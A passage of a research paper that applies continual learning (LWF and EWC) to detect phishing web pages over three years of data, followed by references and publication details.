The visual and hybrid features-based techniques are pretty robust in phishing detection. However, these techniques pose a new challenge to the computational complexity of the model and the time to extract all features on runtime. Moreover, the existing literature on phishing detection has yet to consider the performance deterioration in ML-based systems over time. Thus, we need an efficient, robust, and adaptive model that solves existing work problems.

To the best of our knowledge, prior research has exclusively employed traditional VNNs, which have limitations in addressing novel phishing techniques until they are trained or fine-tuned on newly acquired data. Also, these methods may face performance drops when they are deployed in scenarios where phishing attacks are changing rapidly. Therefore, life-long phishing detectors are useful to deploy in those scenarios where retaining all previous data is costly and phishing attacks are evolving continuously. Also, they can be deployed to detect zero-day attacks. Also, CL algorithms are generally used in computer vision to retrain existing models to adopt new tasks without forgetting knowledge of prior tasks. We have applied CL algorithms like learning without forgetting (LWF) 33 and elastic weight consolidation (EWC) 34 to reduce the systematic performance drop in phishing detection models. LWF is a technique that enables an ML model to learn new tasks without forgetting previously learned knowledge. EWC is a method that selectively reinforces the important weights of a neural network to prevent catastrophic forgetting.

Research tools and methods

In this section, we briefly describe different embedding methods and TL techniques.

Embedding Techniques in ML

There is a range of NLP embedding models with different sizes and capabilities. The specific task requirements and computation resource availability can influence the selection of an embedding model. Some well-known embedding models are Word2Vec, Glove, FastText, ELMo, and BERT, which are briefly described as follows.

Mikolov et al. 35 proposed a model called Word2Vec, which is trained on Wikipedia pages, and it effectively learns the semantic relationships between words. It has two variants: a continuous bag of words (CBOW) and a skip-gram. The CBOW model predicts a target word based on its context, while the Skip-gram model predicts the context words based on a target word. Word2Vec embeddings have sizes in the range of 100–300.

Pennington et al. 36 introduced global vectors for word representation (GloVe). The gloVe is another widely used word embedding technique that is trained on large co-occurrence matrices of words to generate embeddings that capture both syntactic and semantic relationships between words. GloVe embeddings are of sizes from 100 to 300 and are known for their effectiveness in capturing global word co-occurrence patterns. However, they may not perform well on out-of-vocabulary words.

Bojanowski et al. 37 presented a method called FastText, which is based on the Word2Vec model, but it also incorporates subword information. It breaks down each word into smaller character-based n-grams and learns embeddings for each n-gram with the complete word. This allows FastText to capture morphological information and handle rare and out-of-vocabulary words better than other embedding techniques. FastText embeddings are typical of sizes in the range of 100–300.

Devlin et al. 38 designed bidirectional encoder representations from transformers (BERT), a state-of-the-art word embedding technique that uses a transformer model to generate contextualized word embeddings. It is trained on large amounts of text data in an unsupervised manner to generate embeddings that capture the meaning of words in context. BERT embeddings are typically of size in the range of 768–1024, and they are known for their effectiveness in learning complex NLP tasks such as question-answering, etc.

Cer et al. 39 suggested a method called embeddings from language models (ELMo), which is a contextualized word embedding technique that generates embeddings based on the entire sentence context. It uses a bidirectional LSTM neural network to generate embeddings that capture the meaning of words in context. ELMo embedding vector is 1024 dimensional, and they are known for their effectiveness in capturing complex relationships between words and handling polysemy. However, they can be computationally expensive to train and require a large amount of training data.

After studying these embedding techniques from the literature, we found FastText suitable as it is a good balance between embedding size and vector quality, making it a popular choice for many NLP tasks. Also, FastText is trained on a common crawl dataset consisting of web pages related to our problem. Word2Vec and Glove are small and used for non-complex tasks, while ELMo and BERT are very complex models used for complex tasks.

TL Techniques

TL is an ML technique that involves taking knowledge learned from one task and applying it to a new problem. A few TL-based techniques are; (i) fine-tuning, (ii) CL, (iii) domain adaptation (DA), (iv) progressive neural networks (PNNs), and (v) multi-task learning. These techniques are briefly explained as follows.

Fine-tuning involves taking a pre-trained model and adjusting it to perform a new task. The pre-trained model is usually trained on a large dataset, and the fine-tuning process involves training the model on a smaller, task-specific dataset. During fine-tuning, the weights of the pre-trained model are adjusted to better fit the new dataset while retaining the learned features from the original dataset. This process can significantly reduce the training time and computational resources required to train a new model from scratch 40 .

Lange et al. 41 proposed a method called CL that adapts to new information over time. The main objective of CL is to develop models to learn and retain new information without forgetting the previously learned knowledge. CL is critical in real-world applications where data is constantly changing or evolving. Various CL algorithms, such as regularization, LWF, EWC, etc., are used to improve the ML models continuously over time.

In multi-task learning, multiple tasks are learned in parallel to generalize the ML model. So, it requires data availability for all tasks to be present before training. While in life-long learning scenarios, the model can be adapted for a new task at any time using only new available data 42 .

Rusu et al. 43 introduced PNNs, which consist of a series of neural networks, each specialized in performing a specific task. Each network is trained on its specific task and can be used independently to make predictions. When a new task is introduced, a new network is added to the series, but the previously learned networks are frozen and kept unchanged. PNNs require a careful design of the network architecture and the training procedure to ensure that the added columns of neurons do not interfere with the existing knowledge. PNN is challenging to implement and optimize because it is computationally expensive, hence, infeasible for life-long learning.

In DA, an ML model which is previously trained on the source domain is adapted to the target domain, where the output is the same for the source and target domain, but the input data distribution is entirely different, requiring data availability for both domains that increase training complexity, high storage, and computation cost, and may face catastrophic forgetting as the number of retraining iterations increases, hence, infeasible for life long learning 44 .

After studying different TL techniques, we selected the fine-tuning and CL-based algorithms as they require less retraining time and have low computation costs.

Methodology

This section covers a detailed discussion of our methodology to identify and mitigate the performance drop. We analyzed our dataset features using low-dimensional principal component analysis (PCA) embedding of samples to visualize the difference in distribution. We transformed features into 1-D and 2-D PCA as shown in Figs. 1 and 2 , respectively. Figure 1 shows the features distribution of 1-D PCA trends for data samples taken from 3 consecutive years, and the x-axis represents 1-D feature values while the y-axis represents the frequency of samples. It depicts the change in the distribution of features with one year gap. Similarly, we analyzed 2-D PCA features in Fig. 2 . Figure 2 a shows the scatter graph for all normal samples. Figure 2 b shows the distribution of all phishing samples, and similarly, Fig. 2 c shows the distribution for all phishing and normal samples collected in 3 consecutive years. These results show that feature distribution shift over the years is inevitable, which implies that one model trained on historical data can not perform consistently well in subsequent years’ data. Therefore, a solution is required to cope with this changing data distribution.

Distributions shift in one-dimensional PCA representation for three years data.

Distributions shift in two-dimensional PCA representation for three years data.

To the best of our knowledge, there is no standard dataset for phishing samples. We, therefore, collected phishing samples that are reported on community platforms (like VirusTotal 45 and PhishTank 46 ). The dataset contains extensive samples for training ML models across subsequent years to understand the performance drop over time. The dataset contains two types of web pages, i.e., phishing and benign. Their details are as follows.

Phishing samples This set contains around 90k HTML web page samples that are submitted on famous community websites (PhishTank and VirusTotal) as malicious pages. This dataset contains only those samples which are active during the consecutive three years, i.e., 2018–2020, and marked as phishing samples by more than ten reputed Antivirus vendors such as VirusTotal.

Benign samples This dataset contains around 80k HTML web pages submitted on VirusTotal in the same three years and not marked as phishing or malicious by more than 3 Antivirus vendors. We use a low threshold for Antivirus (AV) detection because some AV vendors are known to be highly sensitive, and they sometimes detect unknown or non-famous benign websites as phishing. Due to this high sensitivity of phishing detection of AV vendors, any web page with three or fewer phishing detections is considered a benign sample. Table 1 shows the number of samples per year.

We performed training and testing experiments with six datasets to show the performance drop. We divided the three consecutive years (from 2018 to 2020) datasets into two equal sizes. Datasets are named as 2018A, 2018B, 2019A, 2019B, 2020A and 2020B.

Data pre-processing and features extraction

First, as a pre-processing step, we excluded anomalous website samples, such as pages with very little HTML content. In the next step, we analyzed dataset features for ML model training. Many hand-crafted features proposed in recent studies are helpful in phishing detection with ML 13 , 20 , 21 . These features must be more exhaustive to detect advanced phishing attacks as websites evolve continuously. We employ deep feature representation of full HTML content (code and text) to address this issue using vector embedding. Vector embedding contains compressed and important information that NN can easily use to learn non-linear functions. We used a very powerful embedding model called “FastText” 37 , which is trained on Wikipedia pages. FastText produces an embedding with a dimension size 300. The dimension size 300 is a good balance between vector quality and model complexity.

Experiments and results

To evaluate the performance of the proposed CL-based phishing attack detection system, we performed experiments on VNN, TL, and CL models. For the CL experiments, we used two deep-learning techniques, LWF (a technique that enables an ML model to learn new tasks without forgetting previously learned knowledge) and EWC (a method that selectively reinforces the necessary weights of a NN to prevent catastrophic forgetting). In this section, we cover the details of the experiments and results. For each model, we trained six VNN models, each using a dataset, and then tested the trained model on all the datasets from 2018A to 2020B to compare their accuracy. The training, validation, and testing ratio is 80, 10, and 10 percent, respectively. Table 2 mentions the hyper-parameters used in all experiments. Moreover, the configuration we used for TL and CL experiments is the same as that of VNN experiments.

Experiments with VNN

VNN architecture.

A VNN consists of an input layer, one or more hidden layers, and an output layer. Each layer comprises multiple neurons, where each neuron performs a weighted sum of its inputs, adds a bias term, and passes the result through a non-linear activation function such as ReLU, tanh, or sigmoid. Then, this result is passed to the subsequent layers. At the output layer, the error between the actual and predicted output is computed using a loss function, such as cross-entropy loss. This loss is minimized by using optimizers like SGD or Adam and backpropagated to the network by computing gradients at each layer.

Figure 3 shows the architecture of the VNN model that we have used in our experiments. An input layer that consists of a 300-dimensional feature vector. There are four hidden layers that have 256, 128, 64, and 32 neurons, respectively. Sigmoid activation and a dropout of 20% are used after each hidden layer. We have used the binary cross-entropy loss function with Adam optimizer for the binary classification task (phishing Vs. benign).

Figure 4 a–f shows a comparison of six experiments with VNN. Each experiment involves one training set at a time and is tested on all datasets. Experiments show that VNN gives high accuracy for the dataset used for training and lower accuracy on other datasets. It is clear from the results that VNN performs well on current tasks only and gradually drops accuracy on the previous tasks, i.e., Figure 4 f shows VNN trained on 2020B achieves 96% on 2020B while the same model achieves less than 90% on previous datasets. In each experiment, the results achieved on the current dataset (that is used to train the model) are the best in terms of accuracy, so we use this as the benchmark to compare TL and CL accuracies.

VNN only achieves high testing accuracy on the current dataset while not able to perform on remaining datasets.

Experiments with TL

TL is a well-known technique in deep learning where we fine-tune a pre-trained model (that is perfectly trained on a relevant problem) to a new task 28 . We retrain only the last few layers of the network and freeze the initial layers to use the generic features learned by these layers, as depicted in Fig. 5 . This training regime reduces model convergence time, saves computation resources, and helps to learn with small datasets. However, in TL, the model works well only on new data and forgets the knowledge of old data. In our experiment, we fine-tuned the last two layers of the VNN architecture as shown in Fig. 5 . The pre-trained VNN model is trained for the first chunk, 2018A, and tested on all other datasets. Then, the model is fine-tuned for the second 2018B dataset, and so on, fine-tuned with 2020B. It is observed that the more we retrain a model, the decrease in performance on the previous datasets is inevitable.

TL block diagram where red color shows fine-tuned layers.

Figure 6 shows accuracy results using TL. TL makes some improvements in accuracy when a model is retrained on the following tasks. However, it is not the practical solution to this problem as it also deteriorates performance on the old tasks. Each experiment in Fig. 6 a–f represents several retraining applied on the 2018A model, like experiment two on Fig. 6 b represents when 2018A model is retrained with new dataset 2018B, it achieves 95% accuracy on 2018B and reduces accuracy on old task 2018A from 95% to 93%. Similarly, Fig. 6 c shows that retraining the recently fine-tuned model for 2019A achieves 95% accuracy for it but reduces accuracy for both old datasets 2018A and 2018B. Finally, Fig. 6 f shows accuracy for 2018A drops to 87% when retrained with five subsequent tasks while achieving high accuracy on 2020B. It is an inherent drawback with TL that it forgets previous tasks as moving forward.

TL gradually decreases accuracy on previous datasets as the number of retraining tasks increases.

Experiments with CL: learning without forgetting

CL is a training paradigm that allows the model to continuously adapt and learn new tasks without losing knowledge of the old ones, even without access to old data. Unlike TL, in which the model only works with new data, the CL technique is designed to work on both old and new data. Using the model trained on the old tasks, we apply CL incrementally to make it work on the dataset belonging to subsequent years. We used two state-of-the-art CL techniques known as learning without forgetting (LWF) 33 , discussed below, and elastic weight consolidation (EWC) 34 , discussed in the following subsection.

Learning without forgetting architecture.

In the LWF technique, we retrain the model on the new task and impose a penalty in the loss function that enforces it to maintain performance on the old tasks ( the task is as a set of input features and their corresponding targets used in the retraining of the model). Figure 7 shows two parts in the LWF model: (1) shared weights $\theta _s$ and (2) task-specific weights $\theta _o$ . The shared weights contain the combined knowledge for all tasks, while task-specific weights are added on runtime as the number of tasks is increased in the future. LWF algorithm does not require data belonging to old tasks during CL. It is based on the intuition that by stabilizing the outputs from neurons belonging to old tasks on the new data, the model does not change the weights of the neurons essential for the old tasks.

Algorithm 1 explains a step-by-step process to retrain the model with a new task. Our base VNN model, i.e., $VNN(\varvec{X_{n}, \theta {s}, \theta {o}} )$ is first trained on 20218A dataset, then a task-specific layer $\theta _n$ is added for a new task such as 2018B. Before any retraining, it records outputs $\it{Y}_o$ for the old task from the enhanced model. Then it trains the model to adjust the parameters to work well on old and new tasks using the data belonging to only new tasks. It performs two main computations during retraining, (a) it enforces the model to maintain the old task loss $\mathcal{L}_{old}$ as constant to make sure the model does not forget its current state for the old task, (b) reduces loss, i.e., $\mathcal{L}_{new}$ , for new task heads (detection nodes) that are added to the decision layer with randomly initialized weights $\theta _n$ . The network learns the new tasks and minimizes the loss for only new tasks by using regularization $\mathcal {R}$ with stochastic gradient descent 47 . A new task head can be added when we observe a performance decrease in the base model, as shown in Fig. 7 . All task heads can be used in final decision-making (using majority voting or weightage-based decision), or only the latest task head can be used for the final decision. In our experiments, we trained a VNN model on 2018A, then retrained this model for the subsequent datasets using new task heads. It is observed that LWF sustains the detection performance as compared to TL. We used predictions from the latest task head to compute accuracy on each new task.

Figure 8 a–f shows the results of CL with LWF. We observed that LWF accuracy increases for all datasets while maintaining performance on previous datasets. Similar to TL, each of the six experiments represents the number of retraining attempts that happened with the 2018A model, i.e., experiment 3 in Fig. 8 c represents the results of the 2018A model after retraining on two new datasets. Figure 8 f shows that LWF achieves 93% on the 2018A and achieves 95% on the last task after retraining five times. It shows that the CL method is quite effective in coping with forgetting problems on the old tasks while learning new tasks.

LWF sustains test accuracy on the current and previous datasets after retraining.

Experiments with CL: elastic weight consolidation

Elastic Weight Consolidation (EWC) is another CL technique that is intuitive and effective in learning multiple tasks 34 . In EWC, we find the joint feature space between old and new tasks by adding a penalty in the loss function (Eq. ( 1 )) of the VNN. Figure 9 shows two tasks, A and B, and we can find a common feature space for both tasks during the training. The penalty enforced during training of task B encourages the model to change only those weights that are not used or have less importance for task A. Consequently, the model learns a common feature space representing both tasks. EWC computes the weights’ importance for task A by computing the Fischer importance matrix F 34 for training task B. The penalty in the loss function uses the Fischer matrix as shown in Eq. ( 1 ). The term $L_{B}(\theta )$ is the loss for task B, and $L(\theta )$ is the overall loss that is penalized with the F matrix. Overall loss decreases task B loss with a penalty to learn the common feature space between task A and B. It is observed that it is difficult to maintain high performance on old tasks as the number of tasks increases due to weights saturation.

Elastic weight consolidation conceptual diagram.

Figure 10 a–f shows the EWC method results. It shows that EWC also learns well on the current dataset and preserves the knowledge from the previous training, thus maintaining overall better performance accuracy for all tasks. For example, Fig. 10 f shows that EWC achieves 93% accuracy on the 2018A dataset and achieves 95% on the 2020B dataset, which is quite close to LWF results.

EWC also sustains test accuracy on old tasks but achieves slightly less test accuracy on current tasks than LWF.

From the above four experiments, we observe that VNN performs well only on the current task, TL gives some performance improvement, and CL-based methods give promising results for all tasks as shown in Figs. 4 , 6 , 8 and 10 .

Performance comparison of continual learning

This section describes the overall comparison of CL techniques with VNN and TL-based methods. CL techniques are observed to be resilient and reliable for achieving lifelong high-performance detection of phishing attacks.

Accuracy comparison

Figure 11 shows the performance comparison of best testing accuracies achieved with six datasets and all four techniques. VNN is trained separately for each dataset, while TL and CL models are retrained on each dataset. We see that VNN gives around 95% accuracy while there is a significant performance loss in TL, it loses its performance every time as the retraining tasks increase. While CL techniques outperformed as compared to TL approaches, and their accuracies are close to the VNN accuracy that is considered benchmark accuracy. Thus, CL-based algorithms give promising results for real-time model retraining.

Comparison of TL and CL best accuracies with benchmark accuracy of VNN achieved on historical all datasets.

Confusion matrices

We compare confusion matrices for best performance from all experiments to evaluate VNN, TL, and CL techniques. A confusion matrix has four values: the first row represents true positive (TP) and false negative (FN) as the first and second columns, respectively. While the second row represents false positive (FP) and true negative (TN). In ML model evaluation, the TP value should be higher as it shows how well the model can identify malicious samples. Figure 12 shows confusion matrices for VNN, TL, and CL techniques with experiments on six datasets. It shows that VNN achieves a 97% TP score, the highest TP that is the best result without any retraining. At the same time, LWF gives 94%, which is the best result for all datasets with retraining. It can also be seen from Fig. 12 that VNN has a high true positive rate over the CL-based methods (LWF and EWC), which is computational vs. accuracy trade-off. Therefore, CL-based methods have achieved good accuracy over time, even with little retraining, while VNN requires training from scratch on each dataset. The FN score represents phishing pages that the model has miss-classified. We want the FN number to be as minimum as possible in the ML system. Our analysis shows that the false-negative score is overall lowest with the EWC method, as evident from Fig. 12 .

Confusion matrices comparison for best experiments from VNN, TL, and CL-based methods shows CL methods are close to VNN after retraining.

Discussions

This study investigates the issue of performance drop over time in ML models by retraining the trained model on only new data. To conduct our experiments, we consider two CL-based methods, i.e., EWC and LWF. These methods have relatively low computation and memory costs and require less training data and retraining time than other TL methods, e.g., DA and PNNs, etc. However, CL-based methods have several restrictions, e.g., (i) the size of learnable parameters increases as a new task is added for learning, (ii) catastrophic forgetting may happen after several training attempts by adding new data, and (iii) data bias, where CL model becomes biased for the specific task 48 , 49 .

We had seen in our experiments that when we subsequently trained the CL model on six datasets, it achieved satisfactory results comparable with VNN, even with little retraining on only new data. However, we observed a slight decrease in the true positive rate for CL-based methods because the CL model is trained on new data and may forget previously learned data (catastrophic forgetting). Therefore, it has reduced performance than VNN. Hence, it is a computational vs. accuracy trade-off. To the best of our knowledge, previous studies have used only one or more independent datasets to train and evaluate their ML-based methods for phishing detection. We did not use the datasets used in previous studies as they do not contain multiple years of data. We need multiple years of data to prove the idea of CL in phishing detection. In this regard, we collected our own datasets for three consecutive years and present our results on existing ML-based phishing detection methods like vanilla neural network and TL and compared them with CL to show the life-long phishing detection performance.

Conclusion and future work

In this study, we identified the performance drop of traditional ML models over time. To study the performance drop issue, we conducted several experiments under three different settings: a VNN model without retraining, a VNN model with TL, and a VNN model with CL. Our experiment results show that the VNN models have high detection accuracy when trained in a separate model every time for new datasets with different distributions. This requires training resources such as extensive training data and training time. We want to hold previous knowledge of phishing tactics and want to adapt it to new attacks. For this reason, we experimented with the TL-based model, and it deteriorated in accuracy over time when retrained with new data samples. CL algorithms have the most negligible effect on these changing data distributions due to an efficient retraining mechanism that adapts to new knowledge quickly while maintaining previously learned knowledge. Therefore, CL-based algorithms can be practically used as a first-stage phishing attack detection mechanism in a real-time environment with promising long-term results. CL-based algorithms have practical applications in reducing false positives, improving efficiency, and forming part of an overall phishing defense strategy.

In the future, further investigations can be performed to reduce catastrophic forgetting. As new phishing techniques are introduced, new tasks will be added, which will eventually increase the model’s complexity. This requires much retraining in hyperparameter optimization and finding the best possible set of parameters and model size, which can also be considered as future work. We also aim to explore the various embedding models, like BERT, etc., to extract more powerful features for phishing detection. We consider investigating other continual learning techniques, e.g., replay-based methods, task-specific learning, etc., in phishing detection as future work. Finally, we also consider the adversarial training of the CL-based models in the future.

Data availability

The dataset generated and analyzed during the current study of phishing attack detection is available in the Kaggle Datasets repository: https://www.kaggle.com/datasets/asifejazitu/phishing-dataset .

APWG. Apwg | phishing activity trends reports. Apwg.org. https://apwg.org (2022).

Tian, K., Jan, S. T., Hu, H., Yao, D. & Wang, G., Needle in a haystack: Tracking down elite phishing domains in the wild. In: Proceedings of the Internet Measurement Conference 2018 , 429–442 (2018).

Gupta, B. B., Tewari, A., Jain, A. K. & Agrawal, D. P. Fighting against phishing attacks: State of the art and future challenges, Neural Comput. Appl. 28 , 3629–3654 (2017).

Article Google Scholar

Jain, A. K. & Gupta, B. B. A machine learning based approach for phishing detection using hyperlinks information. J. Ambient. Intell. Humaniz. Comput. 10 , 2015–2028 (2019).

Zhang, W., Jiang, Q., Chen, L. & Li, C. Two-stage ELM for phishing web pages detection using hybrid features. World Wide Web 20 , 797–813 (2017).

Peng, T., Harris, I. & Sawa, Y. Detecting phishing attacks using natural language processing and machine learning, In: 2018 IEEE 12th International Conference on Semantic Computing (ICSC) , 300–301 (IEEE, 2018).

Shirazi, H., Haefner, K. & Ray, I. Fresh-phish: A framework for auto-detection of phishing websites, In: 2017 IEEE International Conference on Information Reuse and Integration (IRI) , 137–143 (IEEE, 2017).

Corona, I. et al. Deltaphish: Detecting phishing webpages in compromised websites, In: European Symposium on Research in Computer Security , 370–388 (Springer, 2017).

Tyagi, I., Shad, J., Sharma, S., Gaur, S. & Kaur, G, A novel machine learning approach to detect phishing websites, In: 2018 5th International Conference on Signal Processing and Integrated Networks (SPIN) , 425–430 (IEEE, 2018).

Shirazi, H., Bezawada, B. & Ray, I. “ kn0w thy doma1n name” unbiased phishing detection using domain name based features, In: Proceedings of the 23nd ACM on Symposium on Access Control Models and Technologies , 69–75 (2018).

Smadi, S., Aslam, N. & Zhang, L. Detection of online phishing email using dynamic evolving neural network based on reinforcement learning. Decis. Support Syst. 107 , 88–102 (2018).

Rao, R. S. & Pais, A. R. Detection of phishing websites using an efficient feature-based machine learning framework. Neural Comput. Appl. 31 , 3851–3873 (2019).

Jain, A. K. & Gupta, B. B. Towards detection of phishing websites on client-side using machine learning based approach. Telecommun. Syst. 68 , 687–700 (2018).

Xiao, X. et al. Phishing websites detection via CNN and multi-head self-attention on imbalanced datasets. Comput. Secur. 108 , 102372 (2021).

Wei, B. et al. A deep-learning-driven light-weight phishing detection sensor, MDPI Sensors. 19 (19), 4258 (2019).

Article ADS PubMed PubMed Central Google Scholar

Patil, S. & Dhage, S. A methodical overview on phishing detection along with an organized way to construct an anti-phishing framework, In 2019 5th International Conference on Advanced Computing & Communication Systems (ICACCS) , 588–593 (IEEE, 2019).

Adebowale, M. A., Lwin, K. T. & Hossain, M. A. Intelligent phishing detection scheme using deep learning algorithms, J. Enterp. Inf. Manag. (2020).

Aljofey, A., Jiang, Q., Qu, Q., Huang, M. & Niyigena, J.-P. An effective phishing detection model based on character level convolutional neural network from URL. Electronics 9 , 1514 (2020).

Sahingoz, O. K., Buber, E., Demir, O. & Diri, B. Machine learning based phishing detection from URLs, Expert Syst. Appl. 117 , 345–357 (2019).

Ubing, A. A., Jasmi, S. K. B., Abdullah, A., Jhanjhi, N. & Supramaniam, M. Phishing website detection: An improved accuracy through feature selection and ensemble learning Int. J. Adv. Comput. Sci. Appl., 10 (2019).

Zamir, A. et al. Phishing web site detection using diverse machine learning algorithms. Electron. Libr. 38 , 65–80 (2020).

Article ADS Google Scholar

Niakanlahiji, A., Chu, B.-T. & Al-Shaer, E. Phishmon: A machine learning framework for detecting phishing webpages. In 2018 IEEE International Conference on Intelligence and Security Informatics (ISI) , 220–225 (IEEE, 2018).

Alhogail, A. & Alsabih, A. Applying machine learning and natural language processing to detect phishing email, Comput. Secur. 110 , 102414 (2021).

Yi, P., Guan, Y., Zou, F., Yao, Y., Wang, W. & Zhu, T. Web phishing detection using a deep learning framework. Wireless Communications and Mobile Computing (2018).

Aljofey, A. et al. An effective detection approach for phishing websites using URL and HTML features. Sci. Rep. 12 , 1–19 (2022).

Zheng, F., Yan, Q., Leung, V. C., Yu, F. R. & Ming, Z. HDP-CNN: Highway deep pyramid convolution neural network combining word-level and character-level representations for phishing website detection. Comput. Secur. 114 , 102584 (2022).

Liu, D.-J., Geng, G.-G., Jin, X.-B. & Wang, W. An efficient multistage phishing website detection model based on the case feature framework: Aiming at the real web environment. Comput. Secur. 110 , 102421 (2021).

Tan, C.L., Chiew, K.L., Yong, K.S., Abdullah, J. and Sebastian, Y. A graph-theoretic approach for the detection of phishing webpages, Comput. Secur. 95 , 101793 (2020).

Chiew, K. L., Tan, C. L., Wong, K., Yong, K. S. & Tiong, W. K, A new hybrid ensemble feature selection framework for machine learning-based phishing detection system. Inf. Sci. 484 , 153–166 (2019).

Chiew, K. L., Chang, E. H., & Tiong, W. K. Utilisation of website logo for phishing detection. Comput. Secur. , 54 , 16–26 (2015).

Barraclough, P. A., Fehringer, G. & Woodward, J. Intelligent cyber-phishing detection for online Comput. Secur. 104 , 102123 (2021).

Adebowale, M. A., Lwin, K. T., Sanchez, E. & Hossain, M. A. Intelligent web-phishing detection and protection scheme using integrated features of images, frames and text. Expert Syst. Appl. 115 , 300–313 (2019).

Li, Z. & Hoiem, D. Learning without forgetting. IEEE Trans. Pattern Anal. Mach. Intell. 40 , 2935–2947 (2017).

Article PubMed Google Scholar

Kirkpatrick, J. et al. Overcoming catastrophic forgetting in neural networks, In: Proceedings of the national academy of sciences , 114 (13), 3521–3526 (2017).

Article ADS MathSciNet CAS PubMed PubMed Central MATH Google Scholar

Mikolov, T., Chen, K., Corrado, G. & Dean, J. Efficient estimation of word representations in vector space, arXiv preprint arXiv:1301.3781 (2013).

Pennington, J., Socher, R. & Manning, C. D. Glove: Global vectors for word representation, In: Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP) , pp. 1532–1543 (2014).

Bojanowski, P., Grave, E., Joulin, A. & Mikolov, T. Enriching word vectors with subword information. Transact. Assoc. Comput. linguist. 5 , 135–146 (2017).

Devlin, J., Chang, M.-W., Lee, K. & Toutanova, K. BERT: Pre-training of deep bidirectional transformers for language understanding. arXiv preprint arXiv:1810.04805 (2018).

Cer, D. et al. Universal sentence encoder, arXiv preprint arXiv:1803.11175 (2018).

Zhuang, F. et al. A comprehensive survey on transfer learning, In: Proceedings of the IEEE , 109 (1), 43–76 (2020).

De Lange, M. et al. A continual learning survey: Defying forgetting in classification tasks. IEEE Trans. Pattern Anal. Mach. Intell. , 44 (7), 3366–3385 (2021).

Google Scholar

Yu, T., Kumar, S., Gupta, A., Levine, S., Hausman, K., & Finn, C., Gradient surgery for multi-task learning. Adv. Neural. Inf. Process. Syst. 33 , 5824–5836 (2020).

Rusu, A.A. et sl. Progressive neural networks. Neural Information Processing Systems (2016).

Wang, M. & Deng, W., Deep visual domain adaptation: A survey. Neurocomputing 312 , 135–153 (2018).

VirusTotal. Virustotal: A community platform for reporting malicious payloads. https://www.virustotal.com/gui/home/upload (2022).

PhishTank: A community platform for reporting phishing websites. https://phishtank.org/ (2022).

Andrychowicz, M. et al. Learning to learn by gradient descent by gradient descent, Advances in Neural Information Processing Systems 29 (2016).

Mirzadeh, S.I., Farajtabar, M., Pascanu, R. and Ghasemzadeh, H., Understanding the role of training regimes in continual learning. Advances in Neural Information Processing Systems. 33 , 7308–7320 (2020).

Kemker, R., McClure, M., Abitino, A., Hayes, T. & Kanan, C, Measuring catastrophic forgetting in neural networks. In Proceedings of the AAAI Conference on Artificial Intelligence 32 (2018).

Download references

Author information

Authors and affiliations.

Department of Computer Science, Information Technology University, Lahore, 54000, Pakistan

Asif Ejaz, Adnan Noor Mian & Sanaullah Manzoor

You can also search for this author in PubMed Google Scholar

Contributions

Proposal A.E.; Data acquisition, A.E. Investigation, A.E.; Methodology, A.E.; Experiments, A.E.; Supervision, A.N.; Validation, S.M., and A.N.; Writing–original draft, A.E.; Writing-review & editing, S.M., and A.N. All authors reviewed the manuscript.

Corresponding author

Correspondence to Adnan Noor Mian .

Ethics declarations

Competing interests.

The authors declare no competing interests.

Additional information

Publisher's note.

Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Rights and permissions

Open Access This article is licensed under a Creative Commons Attribution 4.0 International License, which permits use, sharing, adaptation, distribution and reproduction in any medium or format, as long as you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons licence, and indicate if changes were made. The images or other third party material in this article are included in the article’s Creative Commons licence, unless indicated otherwise in a credit line to the material. If material is not included in the article’s Creative Commons licence and your intended use is not permitted by statutory regulation or exceeds the permitted use, you will need to obtain permission directly from the copyright holder. To view a copy of this licence, visit http://creativecommons.org/licenses/by/4.0/ .

Reprints and permissions

About this article

Cite this article.

Ejaz, A., Mian, A.N. & Manzoor, S. Life-long phishing attack detection using continual learning. Sci Rep 13 , 11488 (2023). https://doi.org/10.1038/s41598-023-37552-9

Download citation

Received : 31 December 2022

Accepted : 23 June 2023

Published : 17 July 2023

DOI : https://doi.org/10.1038/s41598-023-37552-9

Share this article

Anyone you share the following link with will be able to read this content:

Sorry, a shareable link is not currently available for this article.

Provided by the Springer Nature SharedIt content-sharing initiative

By submitting a comment you agree to abide by our Terms and Community Guidelines . If you find something abusive or that does not comply with our terms or guidelines please flag it as inappropriate.

Quick links

Explore articles by subject
Guide to authors
Editorial policies

Sign up for the Nature Briefing: AI and Robotics newsletter — what matters in AI and robotics research, free to your inbox weekly.

Human Factors in Phishing Attacks: A Systematic Literature Review

New Citation Alert added!

This alert has been successfully added and will be sent to:

You will be notified whenever a record that you have chosen has been cited.

To manage your alert preferences, click on the button below.

New Citation Alert!

Please log in to your account

Information & Contributors

Bibliometrics & citations.

Yasin A Fatima R Wen L JiangBin Z Niazi M (2025) What goes wrong during phishing education? A probe into a game-based assessment with unfavorable results Entertainment Computing 10.1016/j.entcom.2024.100815 52 (100815) Online publication date: Jan-2025 https://doi.org/10.1016/j.entcom.2024.100815
Fan Z Li W Laskey K Chang K (2024) Investigation of Phishing Susceptibility with Explainable Artificial Intelligence Future Internet 10.3390/fi16010031 16 :1 (31) Online publication date: 17-Jan-2024 https://doi.org/10.3390/fi16010031
Katsarakes E Edwards M Still J (2024) Where Do Users Look When Deciding If a Text Message is Safe or Malicious? Proceedings of the Human Factors and Ergonomics Society Annual Meeting 10.1177/10711813241264204 Online publication date: 12-Aug-2024 https://doi.org/10.1177/10711813241264204
Show More Cited By

Index Terms

Human-centered computing

Human computer interaction (HCI)

Security and privacy

Human and societal aspects of security and privacy

Intrusion/anomaly detection and malware mitigation

Social engineering attacks

Recommendations

Mitigating phishing attacks: an overview.

Social engineering is the process of getting a person to provide a service or complete a task that may give away private or confidential information. Phishing is the most common type of social engineering. In phishing, an attacker poses as a trustworthy ...

Defending against phishing attacks: taxonomy of methods, current issues and future directions

Internet technology is so pervasive today, for example, from online social networking to online banking, it has made people's lives more comfortable. Due the growth of Internet technology, security threats to systems and networks are relentlessly ...

Fighting against phishing attacks: state of the art and future challenges

In the last few years, phishing scams have rapidly grown posing huge threat to global Internet security. Today, phishing attack is one of the most common and serious threats over Internet where cyber attackers try to steal user's personal or financial ...

Information

Published in.

University of Sydney, Australia

Association for Computing Machinery

New York, NY, United States

Publication History

Permissions, check for updates, author tags.

human factors
cybersecurity

Funding Sources

Italian Ministry of University and Research (MUR)
PON projects LIFT, TALIsMAn, and SIMPLe
“Dipartimento di Eccellenza”
DATACLOUD, DESTINI, and FIRST
RoMA—Resilience of Metropolitan Areas

Contributors

Other metrics, bibliometrics, article metrics.

35 Total Citations View Citations
3,553 Total Downloads
